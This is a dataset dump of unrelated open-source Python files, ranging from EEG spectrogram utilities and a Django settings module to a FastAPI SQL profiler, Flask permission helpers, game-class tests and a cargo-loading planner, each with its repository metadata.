ie the periodic component\n :param freqs: frequencies corresponding to the y axis\n :param psd: power points corresponding to the x axis\n :param frange: range of frequencies where to compute the PSD\n :return: new set of frequencies, periodic component\n \"\"\"\n fm = FOOOF()\n fm.fit(freqs=freqs, power_spectrum=psd, freq_range=frange)\n aperiodic_component = gen_aperiodic(fm.freqs, fm._robust_ap_fit(fm.freqs, fm.power_spectrum))\n periodic_component = fm.power_spectrum - aperiodic_component\n return fm.freqs, periodic_component\n\n\ndef get_aperiodic(freqs: ArrayLike, psd: ArrayLike, frange: List[int] = None) -> (ArrayLike, ArrayLike):\n \"\"\"\n Computes aperiodic component of the psd\n :param freqs:\n :param psd:\n :param frange:\n :return:\n \"\"\"\n fm = FOOOF()\n fm.fit(freqs=freqs, power_spectrum=psd, freq_range=frange)\n init_ap_fit = gen_aperiodic(fm.freqs, fm._robust_ap_fit(fm.freqs, fm.power_spectrum))\n return fm.freqs, init_ap_fit\n\n\ndef find_closest_index(data: ArrayLike, datapoint: float) -> int:\n \"\"\"\n Given an array of data and a datapoint it returns the index of the element that has\n the minimum difference to the datapoint\n :param data: data array-like\n :param datapoint: datapoint to find a close value to\n :return: index of the closest element\n \"\"\"\n min_difference = np.inf\n idx = 0\n for i in range(len(data)):\n if abs(data[i] - datapoint) < min_difference:\n min_difference = abs(data[i] - datapoint)\n idx = i\n return idx\n\n\ndef find_closest_smaller_index(data: ArrayLike, datapoint: float) -> int:\n \"\"\"\n Given an array of data and a datapoint it returns the index of the element that is the closest but lower than\n the datapoint\n :param data: data array-like\n :param datapoint: datapoint to find a close value to\n :return: index of the closest element, lower than the datapoint\n \"\"\"\n min_difference = np.inf\n idx = 0\n for i in range(len(data)):\n if abs(data[i] - datapoint) < min_difference:\n if data[i] < datapoint:\n min_difference = abs(data[i] - datapoint)\n idx = i\n return idx\n\n\ndef get_fast_foofed_specgram(raw: ArrayLike, fs: float, nperseg: int,\n noverlap: int, frange: List[int] = None) -> (ArrayLike, ArrayLike, ArrayLike):\n \"\"\"\n Returns a matrix corresponding to a periodgram where from each column the aperiodic component has been subtracted.\n Because of computational intensity only the overall aperiodic component is computed.\n :param raw: raw signal\n :param fs: sampling frequency\n :param nperseg: number of points per segment\n :param noverlap: number of points to overlap\n :param frange: frequency range for the in which to compute the aperiodic component\n :return: timepoints array, frequencies array, normalized matrix\n \"\"\"\n _t, _f, sxx = signal.spectrogram(raw, fs=fs, nperseg=nperseg, noverlap=noverlap)\n freqs, psd = signal.welch(raw, fs=fs, nperseg=nperseg, noverlap=noverlap)\n\n f, aperiodic = get_aperiodic(freqs=freqs, psd=psd, frange=frange)\n aperiodic = np.flipud(aperiodic[:, None])\n\n lower = find_closest_smaller_index(freqs, frange[0])\n upper = find_closest_smaller_index(freqs, frange[1])\n psd_matrix = np.log10(sxx[lower:upper])\n foofed = psd_matrix - aperiodic\n\n nt = len(foofed[-1]) * (nperseg - noverlap)\n t = np.linspace(0, nt, num=len(foofed[-1]))\n return t, f, foofed\n\n\ndef get_spectrogram_data(fs: float, raw: ArrayLike, nfft: int = None,\n noverlap: int = None, **kwargs) -> Tuple[ArrayLike]:\n \"\"\"\n Gets the data used to plot a spectrogram\n :param fs: sampling frequency\n :param raw: raw data\n :param nfft: nfft to compute the fft\n :param noverlap: number of overlap points\n :return:\n \"\"\"\n pxx, freq, t, _ = plt.specgram(raw, NFFT=nfft, Fs=fs, noverlap=noverlap, **kwargs)\n\n return pxx, freq, t","repo_name":"WengerLab/neurokin","sub_path":"utils/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":7844,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38563146866","text":"import urllib\nimport re\n\n\ndef urls_in_str(urls_str, query_extract='none'):\n urls = set()\n i = urls_str.find(';http')\n while i >= 0:\n urls.add(urllib.unquote(urls_str[:i]))\n urls_str = urls_str[i + 1:]\n i = urls_str.find(';http')\n urls.add(urllib.unquote(urls_str))\n return urls\n\n\ndef n_grams(urls, ns, min_word_length=2, word_type='alphanumeric'):\n \n grams = set()\n for n in ns:\n for url in urls:\n \n if word_type == 'letters':\n sequence = re.findall(r\"[a-zA-Z]{\" + str(min_word_length) + \",}\", url) \n elif word_type == 'alphanumeric':\n sequence = re.findall(r\"[a-zA-Z0-9]{\" + str(min_word_length) + \",}\", url)\n elif word_type == 'alphanumeric_':\n sequence = re.findall(r\"[a-zA-Z0-9_]{\" + str(min_word_length) + \",}\", url)\n\n for i in range(len(sequence) - n + 1):\n grams.add('_'.join(sequence[i:i + n]).lower())\n\n return grams\n\n\n\n\n\n\ndef iterraw(segment, mode='all', files_n=1):\n \"\"\"Iterator over dataset.\n \n Parameters:\n segment - string from ['gender_male', 'age_15_24', ...].\n mode - 'training' - only yield data items with CookieMod10 != 9,\n 'test' - only yield data items with CookieMod10 = 9,\n 'all' - yield all data items.\n files_n - integer, 0 < files_n < 48. Yield data from first\n files_n files.\n\n iterraw() yields tuples (cookie_id, label, urls_visited,\n domains_visited_rtb), where\n cookie_id - CookieID,\n label - 1, if user belongs to the given segment, 0 otherwise,\n urls_visited - string of urls separated by ';',\n domains_visited_rtb - string of domains separated by ';'.\"\"\"\n\n if mode == 'test':\n suffixes = ['ALL_MOD_9']\n elif mode == 'training' or mode == 'all':\n suffixes = ['000001', '000008', '000010', '000011', '000012', '000013',\n '000014', '000015', '000016', '000017', '000018', '000019',\n '000020', '000021', '000022', '000023', '000024', '000025',\n '000026', '000027', '000028', '000029', '000030', '000031',\n '000032', '000033', '000034', '000035', '000036', '000037',\n '000038', '000039', '000040', '000041', '000042', '000043',\n '000044', '000045', '000046', '000047', '000048', '000049',\n '000066', '000067', '000068', '000069', '000071'][:files_n]\n\n for suffix in suffixes:\n filename = ('data/20131015_female/'\n + '8191ca07-4888-4484-8bf6-44bdb7c66a77_' + suffix)\n f = open(filename, 'r')\n for line in f.readlines():\n \n (browser, os, screen_size, country, clicker, urls_visited,\n domains_visited_rtb, user_verticals, user_agent, cookie_mod_10,\n cookie_id, segments, negative, positive) = line.split('\\t')\n \n if mode == 'training' and cookie_mod_10 == '9':\n continue\n elif mode == 'train' and cookie_mod_10 != '9':\n continue\n \n if segment in segments:\n label = 1\n elif segment[:segment.find('_')] in segments:\n label = 0\n else:\n continue\n\n cookie_id = int(cookie_id)\n\n yield (cookie_id, label, urls_visited, domains_visited_rtb)\n\n f.close()","repo_name":"jurgisp/adform-dsp-acadmey","sub_path":"vb/demog3/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27134603944","text":"'''\nadd this to the end of settings.py\nenv settings for containerization\n\ntry:\n from .env_settings import * \nexcept ImportError: \n pass \n'''\n\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n#Get Django environment set by docker or use local\ntry:\n DJANGO_ENV = os.environ.get(\"DJANGO_ENV\")\nexcept:\n DJANGO_ENV = 'local'\n\n# env variable DJANGO_ENV set for development or production uses PostgreSQL\nif DJANGO_ENV == 'development' or DJANGO_ENV == 'production':\n\n try:\n SECRET_KEY = os.environ.get(\"SECRET_KEY\")\n except:\n SECRET_KEY = 'localsecret'\n\n try:\n DEBUG = bool(int(os.environ.get(\"DEBUG\", default=0)))\n except:\n DEBUG = False\n\n try:\n ALLOWED_HOSTS = os.environ.get(\"DJANGO_ALLOWED_HOSTS\").split(\" \")\n except:\n ALLOWED_HOSTS = ['127.0.0.1', '0.0.0.0', 'localhost']\n\n DATABASES = {\n \"default\": {\n \"ENGINE\": os.environ.get(\"DB_ENGINE\", \"django.db.backends.sqlite3\"),\n \"NAME\": os.environ.get(\"POSTGRES_DB\", os.path.join(BASE_DIR, \"db.sqlite3\")),\n \"USER\": os.environ.get(\"POSTGRES_USER\", \"user\"),\n \"PASSWORD\": os.environ.get(\"POSTGRES_PASSWORD\", \"password\"),\n \"HOST\": os.environ.get(\"DB_HOST\", \"localhost\"),\n \"PORT\": os.environ.get(\"DB_PORT\", \"5432\"),\n }\n }\n\n# CORS rules\nCORS_ORIGIN_ALLOW_ALL = True\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = '/static/'","repo_name":"spells3/robodc","sub_path":"env_settings.py","file_name":"env_settings.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69843117868","text":"import os\nimport math\nfrom pathlib import Path\nfrom fastapi import APIRouter, Request, status\nfrom fastapi.responses import HTMLResponse, JSONResponse\nfrom fastapi.templating import Jinja2Templates\n\nfrom .database import session\nfrom .models import QueryInfo, RequestInfo\n\nrouter = APIRouter()\n\n\nBASE_PATH = Path(__file__).resolve().parent\ntemplates = Jinja2Templates(directory=str(BASE_PATH / \"templates\"))\n\n\n@router.get(\"/all_request\", response_class=HTMLResponse)\nasync def all_request(request: Request, page: int = 1, limit: int = 20):\n \"\"\"Get all request.\"\"\"\n all_request_info = session.query(\n RequestInfo).order_by(-RequestInfo.id).all()\n total_request_info = len(all_request_info)\n total_pages = math.ceil(total_request_info / limit)\n\n start_index = (page - 1) * limit\n end_index = start_index + limit\n request_info = all_request_info[start_index:end_index]\n context = {\"request\": request, \"request_info\": request_info, \"current_api\": \"all_request\",\n \"page\": page,\n \"limit\": limit,\n \"total_pages\": total_pages,\n \"total_request_info\":total_request_info,\n }\n return templates.TemplateResponse(\"request_show.html\", context)\n\n\n@router.get(\"/request_detail/{id}\", response_class=HTMLResponse)\ndef request_show(id: int, request: Request):\n \"\"\"Get single request.\"\"\"\n request_query = session.query(RequestInfo).get(id)\n query_detail = session.query(QueryInfo).filter_by(request_id=id)\n sum_on_query = 0\n for query_details in query_detail:\n sum_on_query = sum_on_query + query_details.time_taken\n templates.env.globals['current_id'] = id\n context = {\"request\": request, \"request_query\": request_query, \"sum_on_query\": sum_on_query}\n return templates.TemplateResponse(\"request.html\", context)\n\n\n@router.get(\"/request_query/{id}\", response_class=HTMLResponse)\ndef request_query(id: int, request: Request):\n \"\"\"Get single request.\"\"\"\n request_query = session.query(RequestInfo).get(id)\n query_detail = session.query(QueryInfo).filter_by(request_id=id)\n sum_on_query = 0\n for query_details in query_detail:\n sum_on_query = sum_on_query + query_details.time_taken\n templates.env.globals['current_id'] = id\n context = {\"request\": request, \"request_query\": request_query, \"query_detail\": query_detail, \"sum_on_query\": sum_on_query}\n return templates.TemplateResponse(\"sql_query.html\", context)\n\n\n@router.get(\"/request_query_details/{id}\", response_class=HTMLResponse)\ndef request_query_details(id: int, request: Request):\n \"\"\"Get single request.\"\"\"\n query_detail = session.query(QueryInfo).get(id)\n traceback_contents = query_detail.traceback.strip().splitlines()\n traceback_groups = []\n current_group = []\n\n for traceback_content in traceback_contents:\n if 'File \"\"' not in traceback_content:\n if traceback_content.startswith(\" File\"):\n if current_group:\n traceback_groups.append(current_group)\n current_group = []\n current_group.append(traceback_content)\n\n if current_group:\n traceback_groups.append(current_group)\n traceback = []\n for traceback_group in traceback_groups:\n traceback_string = '\\n'.join(traceback_group)\n traceback.append(traceback_string)\n virtualenv_path = os.environ.get('VIRTUAL_ENV')\n context = {\"request\": request,\"query_detail\":query_detail,\"traceback\":traceback,\"virtualenv_path\":virtualenv_path,\"current_api\": \"request_query_details\"}\n return templates.TemplateResponse(\"sql_query_detail.html\", context)\n\n\n@router.delete('/clear_db')\ndef destory(requset: Request):\n \"\"\"Clear DB.\"\"\"\n session.query(RequestInfo).delete()\n session.query(QueryInfo).delete()\n session.commit()\n return JSONResponse(content={\"message\": \"Clear Db Successfully\"},\n status_code=status.HTTP_200_OK)\n","repo_name":"Sarvadhi-Solutions/fastapi-sql-profiler","sub_path":"fastapi_sql_profiler/add_request.py","file_name":"add_request.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"14696727119","text":"import pytest\nfrom razas import *\n\n\nclass Test_unitariossetter():\n def test_crear(self):\n frodo = Hobbit()\n aragorn = Humano()\n gimbli = Enano()\n legolas = Elfo()\n gandalf = Mago()\n azog = Orco()\n\n def test_enano(self):\n gimbli = Enano()\n assert(isinstance(gimbli, Mortal))\n assert(isinstance(gimbli, MortalCodicioso))\n\n assert(gimbli.salud == 100)\n gimbli.salud = 50\n gimbli.beber()\n assert(gimbli.salud == 70)\n\n assert(gimbli.dinero == 10)\n gimbli.minar()\n assert(gimbli.dinero == 11)\n\n gimbli.codicia()\n assert(gimbli.salud == 60)\n assert(gimbli.dinero == 16)\n\n def test_hobbit(self):\n frodo = Hobbit()\n\n frodo.salud = 10\n\n frodo.comer()\n assert(frodo.salud == 100)\n\n def test_mago(self):\n frodo = Hobbit()\n aragorn = Humano()\n gimbli = Enano()\n legolas = Elfo()\n gandalf = Mago()\n azog = Orco()\n assert(not isinstance(gandalf, Mortal))\n gandalf.anadir_miembro_compania(frodo)\n gandalf.anadir_miembro_compania(aragorn)\n gandalf.anadir_miembro_compania(gimbli)\n gandalf.anadir_miembro_compania(legolas)\n\n assert(len(gandalf._compania) == 4)\n\n def test_properties(self):\n isinstance(Enano().salud, property)\n isinstance(Enano().dinero, property)\n\n\nclass Test_integracion():\n\n def test_orco(self):\n azog = Orco()\n gimbli = Enano()\n\n azog.atacar(gimbli)\n assert(gimbli.salud == 90)\n\n def test_humano(self):\n aragorn = Humano()\n assert(isinstance(aragorn, Mortal))\n assert(isinstance(aragorn, MortalCodicioso))\n\n assert(aragorn.salud == 100)\n aragorn._salud = 50\n aragorn.beber()\n assert(aragorn.salud == 60)\n\n assert(aragorn.dinero == 10)\n\n aragorn.codicia()\n assert(aragorn.salud == 50)\n assert(aragorn.dinero == 15)\n\n for i in range(11):\n aragorn.beber()\n assert(aragorn.salud == 100)\n\n gimbli = Enano()\n aragorn.atacar(gimbli)\n assert(gimbli.salud == 90)\n\n def test_elfo(self):\n legolas = Elfo()\n gimbli = Enano()\n\n assert(legolas.flechas == 10)\n legolas.recargar()\n legolas.disparar_flecha(gimbli)\n assert(gimbli.salud == 90)\n assert(legolas.flechas == 9)\n\n def test_sanar(self):\n legolas = Elfo()\n gandalf = Mago()\n legolas.salud -= 20\n gandalf.sanar(legolas)\n assert(legolas.salud == 100)\n\n\nclass Test_excepciones():\n\n def test_elfo_no_preparado(self):\n legolas = Elfo()\n gimbli = Enano()\n\n with pytest.raises(FlechaNoPreparada) as e:\n legolas.disparar_flecha(gimbli)\n assert e.type == FlechaNoPreparada\n\n def test_compania_sin_hobbit(self):\n frodo = Hobbit()\n aragorn = Humano()\n gimbli = Enano()\n legolas = Elfo()\n gandalf = Mago()\n azog = Orco()\n with pytest.raises(CompaniaSinHobbit) as e:\n gandalf.anadir_miembro_compania(aragorn)\n assert e.type == CompaniaSinHobbit\n\n def test_orco_compania(self):\n frodo = Hobbit()\n aragorn = Humano()\n gimbli = Enano()\n legolas = Elfo()\n gandalf = Mago()\n azog = Orco()\n gandalf.anadir_miembro_compania(frodo)\n with pytest.raises(OrcoEnCompania) as e:\n gandalf.anadir_miembro_compania(azog)\n assert e.type == OrcoEnCompania\n\n def test_properties(self):\n isinstance(Enano().salud, property)\n isinstance(Enano().dinero, property)\n","repo_name":"kiey/Lord_Of_Objects_Students","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38787675789","text":"import sys\nfrom os import path\nfrom pydub import AudioSegment\n\nfilePath = sys.argv[1]\nfilePathArr = filePath.split(\"/\")\nfileName = filePathArr[len(filePathArr) - 1]\n\n# files \nsrc = filePath\ndst = \"./audio/{}.wav\".format(fileName.split(\".\")[0])\n\n# convert wav to mp3 \nsound = AudioSegment.from_mp3(src)\nsound.export(dst, format=\"wav\")","repo_name":"Ronald-Prato/audio_processing","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32273036474","text":"from CargoGrid import Cargo_Grid\nfrom CargoGrid import Cargo\nimport pandas as pd\nimport copy\n\n\nclass Transfer:\n\n # cargoList = [] # list of containers\n # nodeList = [] # list of states\n\n def __init__(self, CargoGrid, loadFile, unloadFile):\n self.CargoGrid = CargoGrid\n\n LoadHeaders = ['Cargo']\n self.LoadDF = pd.read_csv(\n loadFile, sep=',', names=LoadHeaders, engine='python')\n\n UnloadHeaders = ['Position']\n self.UnloadDF = pd.read_csv(\n unloadFile, sep=', ', names=UnloadHeaders, engine='python')\n\n self.UnloadList = [] # contains cargo that needs to be unloaded\n self.LoadList = [] # contains cargo getting loaded.\n self.conversion()\n\n def conversion(self): # inputs data into class's list data members\n LoadCargo = Cargo()\n\n for x in (self.LoadDF['Cargo']):\n LoadCargo.name = x\n self.LoadList.append(copy.deepcopy(LoadCargo))\n\n for p in self.UnloadDF['Position']:\n x = int(p[0])\n y = int(p[2])\n self.UnloadList.append(copy.deepcopy(\n self.CargoGrid.cargo_grid[x][y]))\n\n self.UnloadList = sorted(\n self.UnloadList, reverse=True, key=lambda x: x.position[0])\n # self.UnloadList.append(self.CargoGrid.cargo_grid[x][y])\n\n \"\"\"\n def CargoList(self):\n for x in range(len(self.CargoGrid.cargo_grid)):\n if (x == 0):\n continue\n for y in range(len(self.CargoGrid.cargo_grid[x])):\n if (y == 0):\n continue\n if (self.CargoGrid.cargo_grid[x][y].name != \"NAN\" and self.CargoGrid.cargo_grid[x][y].name != \"UNUSED\"):\n self.cargoList.append(copy.deepcopy(\n self.CargoGrid.cargo_grid[x][y]))\n \"\"\"\n\n def setGoals(self):\n for cargo in self.UnloadList:\n x = cargo.position[0]\n y = cargo.position[1]\n cargo.GoalDistance = abs(9-x) + abs(1 - y)\n\n # removes cargo from ship and places it on truck. also finds manhattan distance.\n def Unload(self, unloadCargo):\n x = unloadCargo.position[0]\n y = unloadCargo.position[1]\n if (self.CargoGrid.cargo_grid[x+1][y].name == 'UNUSED'):\n # goal is (9,1) + 2 minutes from ship to truck\n\n if (self.CargoGrid.new_pos[0] != 0 and self.CargoGrid.new_pos[1] != 0):\n if (self.CargoGrid.new_pos == \"Truck\"):\n self.CargoGrid.Manhattan_Dist += abs(9 - x) + \\\n abs(1 - y) + 2\n else:\n self.CargoGrid.Manhattan_Dist += abs(\n x - self.CargoGrid.new_pos[0]) + abs(y - self.CargoGrid.new_pos[1])\n\n self.CargoGrid.Manhattan_Dist += abs(9 - x) + \\\n abs(1 - y) + 2\n self.CargoGrid.cargo_grid[x][y].name = 'UNUSED'\n self.CargoGrid.cargo_grid[x][y].weight = 0\n\n self.CargoGrid.old_pos = [x, y]\n self.CargoGrid.new_pos = \"Truck\"\n\n def Load(self, loadedCargo, position): # loads cargo onto ship at position\n x = position[0]\n y = position[1]\n self.CargoGrid.cargo_grid[x][y].name = loadedCargo.name\n self.CargoGrid.cargo_grid[x][y].weight = loadedCargo.weight\n # initial position is (9,1) + 2 minutes from truck to ship\n self.CargoGrid.Manhattan_Dist += abs(9 - x) + \\\n abs(1 - y) + 2\n self.CargoGrid.old_pos = \"Truck\"\n self.CargoGrid.new_pos = position\n\n def Transfer(self, filename):\n i = 0\n if (len(self.UnloadList) != 0 or len(self.LoadList) != 0):\n transfer = False\n output = \"\"\n self.setGoals()\n self.CargoGrid.output_progression(i)\n self.UnloadList = sorted(\n self.UnloadList, key=lambda x: x.GoalDistance)\n\n while not transfer:\n if len(self.UnloadList) > 0: # unload\n j = 0\n for cargo in (self.UnloadList):\n # check if container is blocking unload\n while self.CargoGrid.cargo_grid[cargo.position[0] + 1][cargo.position[1]].name != \"UNUSED\":\n\n # in case more then one cargo is blocking, get position of highest container in column\n blockingPosition = self.CargoGrid.highestContainer(\n cargo.position[1])\n\n blockingCargo = self.CargoGrid.cargo_grid[blockingPosition[0]\n ][blockingPosition[1]]\n # blockingCargo = self.CargoGrid.cargo_grid[cargo.position[0]+1][cargo.position[1]]\n\n if (blockingCargo.position[1] == 12):\n self.CargoGrid.change_pos(blockingCargo.position, self.CargoGrid.lowestPosition(\n blockingCargo.position[1] - 1)) # move left if blocking cargo is at the end\n else:\n self.CargoGrid.change_pos(blockingCargo.position, self.CargoGrid.lowestPosition(\n blockingCargo.position[1] + 1)) # move to right if cargo is blocking unload\n i += 1\n self.CargoGrid.output_progression(i)\n output += f\"Move {self.CargoGrid.cargo_grid[(self.CargoGrid.new_pos[0])][(self.CargoGrid.new_pos[1])].name} from ({str(self.CargoGrid.old_pos[0])},{str(self.CargoGrid.old_pos[1])}) to ({str(self.CargoGrid.new_pos[0])},{str(self.CargoGrid.new_pos[1])}), Time: {str(self.CargoGrid.Manhattan_Dist)} minutes\\n\"\n\n self.Unload(cargo)\n self.UnloadList.pop(j)\n output += f\"Move {cargo.name} from ({str(self.CargoGrid.old_pos[0])},{str(self.CargoGrid.old_pos[1])}) to truck, Time: {str(self.CargoGrid.Manhattan_Dist)} minutes\\n\"\n i += 1\n self.CargoGrid.output_progression(i)\n j += 1\n break\n\n if len(self.LoadList) > 0: # load\n loadedCargo = self.LoadList.pop(0)\n for column in range(1, 13):\n # load into lowest position of first column that is not full\n if (self.CargoGrid.cargo_grid[8][column].name == \"UNUSED\"):\n self.Load(\n loadedCargo, self.CargoGrid.lowestPosition(column))\n break\n i += 1\n self.CargoGrid.output_progression(i)\n output += f\"Move {loadedCargo.name} from truck to ({str(self.CargoGrid.new_pos[0])},{str(self.CargoGrid.new_pos[1])}), Time: {str(self.CargoGrid.Manhattan_Dist)} minutes\\n\"\n\n if (len(self.UnloadList) == 0 and len(self.LoadList) == 0):\n with open(filename, \"w\") as file:\n file.write(output)\n transfer = True\n else:\n return\n","repo_name":"kartikgulia/Ship-Sorting-Balancing-CodeCraft-Solutions-Backend-","sub_path":"Transfer.py","file_name":"Transfer.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39366410544","text":"from collections import namedtuple\nfrom functools import partial, wraps\n\nfrom flask import abort\nfrom flask_principal import (\n Permission,\n RoleNeed\n)\nfrom bookmark_api.models import (\n User,\n Bookmark\n)\n\n\nBookmarkNeed = namedtuple('bookmark', ['method', 'value'])\nUserNeed = namedtuple('user', ['method', 'value'])\n\nViewBookmarkNeed = partial(BookmarkNeed, 'view')\nDeleteBookmarkNeed = partial(BookmarkNeed, 'delete')\nEditBookmarkNeed = partial(BookmarkNeed, 'edit')\n\nViewUserNeed = partial(UserNeed, 'view')\nDeleteUserNeed = partial(UserNeed, 'delete')\nEditUserNeed = partial(UserNeed, 'edit')\n\n\nclass ViewBookmarkPermission(Permission):\n def __init__(self, id):\n need = ViewBookmarkNeed(id)\n super(ViewBookmarkPermission, self).__init__(need)\n\n\nclass DeleteBookmarkPermission(Permission):\n def __init__(self, id):\n need = DeleteBookmarkNeed(id)\n super(DeleteBookmarkPermission, self).__init__(need)\n\n\nclass EditBookmarkPermission(Permission):\n def __init__(self, id):\n need = EditBookmarkNeed(id)\n super(EditBookmarkPermission, self).__init__(need)\n\n\nclass ViewUserPermission(Permission):\n def __init__(self, id):\n need = ViewUserNeed(id)\n super(ViewUserPermission, self).__init__(need)\n\n\nclass DeleteUserPermission(Permission):\n def __init__(self, id):\n need = DeleteUserNeed(id)\n super(DeleteUserPermission, self).__init__(need)\n\n\nclass EditUserPermission(Permission):\n def __init__(self, id):\n need = EditUserNeed(id)\n super(EditUserPermission, self).__init__(need)\n\n\nadmin_permission = Permission(RoleNeed('admin'))\nclient_permission = Permission(RoleNeed('client'))\n\n\ndef requires_permission(**params):\n def wrapper(f):\n @wraps(f)\n def wrapped(*args, **kwargs):\n id = kwargs[params['field']]\n permission = params['permission_class'](id)\n if permission.can():\n return f(*args, **kwargs)\n return abort(403)\n return wrapped\n return wrapper\n\n\ndef provide_permissions(identity):\n user = User.query.get(identity.id)\n role_name = user.role.name\n identity.provides.add(RoleNeed(role_name))\n if role_name == 'client':\n _provide_client_permissions(identity, user)\n elif role_name == 'admin':\n _provide_admin_permissions(identity, user)\n\n\ndef _provide_client_permissions(identity, user):\n for bookmark in user.bookmarks:\n for need_class in [ViewBookmarkNeed, DeleteBookmarkNeed, EditBookmarkNeed]:\n identity.provides.add(need_class(bookmark.id))\n identity.provides.add(DeleteUserNeed(identity.id))\n identity.provides.add(ViewUserNeed(identity.id))\n identity.provides.add(EditUserNeed(identity.id))\n\n\ndef _provide_admin_permissions(identity, user):\n for bookmark in Bookmark.query.all():\n identity.provides.add(ViewBookmarkNeed(bookmark.id))\n for user in User.query.all():\n for need_class in [ViewUserNeed, EditUserNeed, DeleteUserNeed]:\n identity.provides.add(need_class(user.id))\n","repo_name":"rai200890/bookmark-api","sub_path":"bookmark_api/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40852441774","text":"from book_scrapper import *\nfrom author_scrapper import *\nimport database\n\n''' This file contains the full scrapper\n'''\nclass Scrapper:\n def __init__(self, strating_url, num_books, num_authors):\n ''' initialize a scrapper\n\n Args:\n starting_url: url of the starting page\n num_books: number of books to scrape\n num_authors: number of authors to scrape\n '''\n self._starting_url = strating_url\n self._num_books = num_books\n self._num_authors = num_authors\n self._client = database.connect_to_server()\n\n if self._client is None:\n return\n\n # initial counts are 0\n self._book_count = 0\n self._author_count = 0\n\n \n\n def initial_scrap(self):\n # scrap book with start\n book_id = self.find_id_in_url(self._starting_url)\n book = BookScrapper(self._starting_url, book_id)\n book_info = book.get_info_dictionary()\n if not database.already_exist(book_id, False, False, self._client):\n database.insert_data(False, False, book_info, self._client)\n self._book_count += 1\n print(\"finish scrapping book with id \" + book_id)\n\n author_id = self.find_id_in_url(book_info[\"author_url\"])\n author = AuthorScrapper(book_info[\"author_url\"], author_id)\n author_info = author.get_info_dictionary()\n\n if not database.already_exist(author_id, True, False, self._client):\n database.insert_data(True, False, author_info, self._client)\n self._author_count += 1\n\n # save current author since the next book and author to scrap\n # is realted to first author\n self._current_author = author_info\n\n print(\"finish scrapping author with id \" + author_id)\n\n self.start_traversing()\n database.close_client(self._client)\n\n self.start_traversing()\n \n \n \n def find_id_in_url(self, url):\n ''' find id of a book or author from url\n\n Return:\n id found\n '''\n everything_after_show = url.split(\"show/\")[1]\n\n id = everything_after_show.split(\".\")[0]\n if (len(id) == len(everything_after_show)):\n # if split does not have any effect, the url is formatted in another way\n id = everything_after_show.split(\"-\")[0]\n\n return id\n\n def start_traversing(self):\n ''' start scrapping and stop after scrapping num_books and num_authors\n '''\n while (self._book_count != self._num_books \n and self._author_count != self._num_authors):\n\n # upper limit to scrap\n if self._book_count + self._author_count > 2000:\n break\n\n # get all books of current author first\n author_books = self._current_author[\"author_books\"]\n for book_url in author_books:\n if self._book_count >= self._num_books:\n break\n book_id = self.find_id_in_url(book_url)\n\n # check if book is already scrapped\n if database.already_exist(book_id, False, False, self._client):\n continue\n \n book = BookScrapper(book_url, book_id)\n # insert book info into database\n database.insert_data(False, False, book.get_info_dictionary(), self._client)\n self._book_count += 1\n print(\"finish scrapping book with id \" + book_id)\n time.sleep(3)\n\n # get all related authors\n related_authors = self._current_author[\"related_authors\"]\n for author_url in related_authors:\n if self._author_count >= self._num_authors:\n break\n author_id = self.find_id_in_url(author_url)\n\n # check if author is already scrapped\n if database.already_exist(author_id, True, False, self._client):\n continue\n\n author = AuthorScrapper(author_url, author_id)\n author_info = author.get_info_dictionary()\n # insert book info into database\n database.insert_data(True, False, author_info, self._client)\n self._author_count += 1\n print(\"finish scrapping author with id \" + author_id)\n self._current_author = author_info\n time.sleep(3)","repo_name":"xinshuoLei/Goodreads-Scrapper","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11127116038","text":"#--depends-on commands\n\nfrom src import ModuleManager, utils\n\nclass Module(ModuleManager.BaseModule):\n @utils.hook(\"received.command.echo\")\n @utils.kwarg(\"min_args\", 1)\n def echo(self, event):\n event[\"stdout\"].write(event[\"args\"])\n\n @utils.hook(\"received.command.action\")\n @utils.kwarg(\"min_args\", 1)\n @utils.kwarg(\"expect_output\", False)\n def action(self, event):\n event[\"target\"].send_message(\"\\x01ACTION %s\\x01\" % event[\"args\"])\n\n @utils.hook(\"received.command.msg\")\n @utils.kwarg(\"min_args\", 2)\n @utils.kwarg(\"permission\", \"say\")\n @utils.kwarg(\"remove_empty\", False)\n @utils.kwarg(\"help\", \"Send a message to a target\")\n def msg(self, event):\n event[\"server\"].send_message(event[\"args_split\"][0],\n \" \".join(event[\"args_split\"][1:]))\n","repo_name":"chiefnoah/bitbot","sub_path":"modules/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"12878975686","text":"\"\"\"\r\nThis module implements the Oversampling base class.\r\n\"\"\"\r\n\r\nimport time\r\nimport warnings\r\n\r\nfrom ..config import suppress_internal_warnings\r\n\r\nfrom ._base import (StatisticsMixin, ParametersMixin, RandomStateMixin,\r\n coalesce_dict)\r\nfrom ._metrictensor import MetricLearningMixin\r\nfrom ._simplexsampling import SimplexSamplingMixin\r\n\r\nfrom .._logger import logger\r\n_logger = logger\r\n\r\n__all__= ['OverSampling',\r\n 'OverSamplingSimplex',\r\n 'OverSamplingBase',\r\n 